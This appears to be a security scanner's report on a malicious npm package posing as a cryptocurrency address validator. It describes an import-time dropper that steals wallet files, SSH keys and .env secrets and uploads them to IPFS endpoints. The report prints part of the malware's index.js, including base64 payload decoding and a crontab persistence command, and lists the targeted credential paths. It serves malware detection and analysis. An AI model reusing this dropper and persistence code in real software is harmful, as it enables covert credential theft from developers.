registry  /  crypto-validate-lib  /  1.0.0

crypto-validate-lib@1.0.0

Cross-chain cryptocurrency address validator — validates Bitcoin, Ethereum, Solana, BSC, TRON, Cardano, and more

AI Security Review

scanned 4h ago · by lpm-firewall-ai

Importing the package triggers a delayed hidden dropper. It writes and runs a persistent credential-harvesting payload that exfiltrates encrypted findings.

Static reason
No blocking static signals were detected.
Trigger
Runtime `require`/import of `index.js`, followed by the 37-second timer.
Impact
Steals wallet material, environment secrets, shell-profile secrets, and SSH private keys; persists across reboots.
Mechanism
Delayed payload drop, host persistence, credential harvesting, and encrypted IPFS upload.
Attack narrative
A normal import of `index.js` schedules a concealed dropper. It decodes a base64 fixture into a user-home script, installs cron or scheduled-task persistence, and launches it detached. The dropped script checks IPFS dead drops for activation, searches wallet directories, `.env`, shell profiles, and SSH keys, encrypts findings with an embedded public key, and uploads them through Pinata.
Rationale
This is concrete import-time malware behavior, not a package-aligned validation feature. The absence of npm lifecycle hooks does not mitigate the delayed runtime dropper and credential exfiltration chain.
Evidence
index.jstest/fixtures/keypairs.datpackage.json~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/.config/solana~/.ethereum/keystore~/.ssh
Network endpoints4
gateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs an unexported dropper on module import after 37 seconds.
  • `index.js` decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js` with mode 0700.
  • `index.js` installs cron or scheduled-task persistence and detaches `node syncd.js`.
  • Decoded `test/fixtures/keypairs.dat` searches wallet files, `.env`, shell profiles, and SSH private keys.
  • Decoded payload encrypts harvested data and uploads it to Pinata/IPFS endpoints.
  • Decoded payload uses IPFS dead drops to remotely activate collection.
Evidence against
  • `package.json` has no lifecycle scripts.
  • The exported validator functions are locally implemented regex checks.
Behavioral surface
Source
ChildProcessFilesystemShell
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.94 KB of source

Source & flagged code

1 flagged · loading source
index.jsView file
52var o = require("os"); L53: var c = require("child_process"); L54: var h = o.homedir(); L55: var d = p.join(h, ".cache-db", ".node-sync"); ... L61: var b64 = f.readFileSync(src, "utf8").trim(); L62: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L63: try { L64: if (process.platform === "linux") { L65: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L66: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L52

Findings

1 Medium1 Low
MediumInstall Persistenceindex.js
LowFilesystem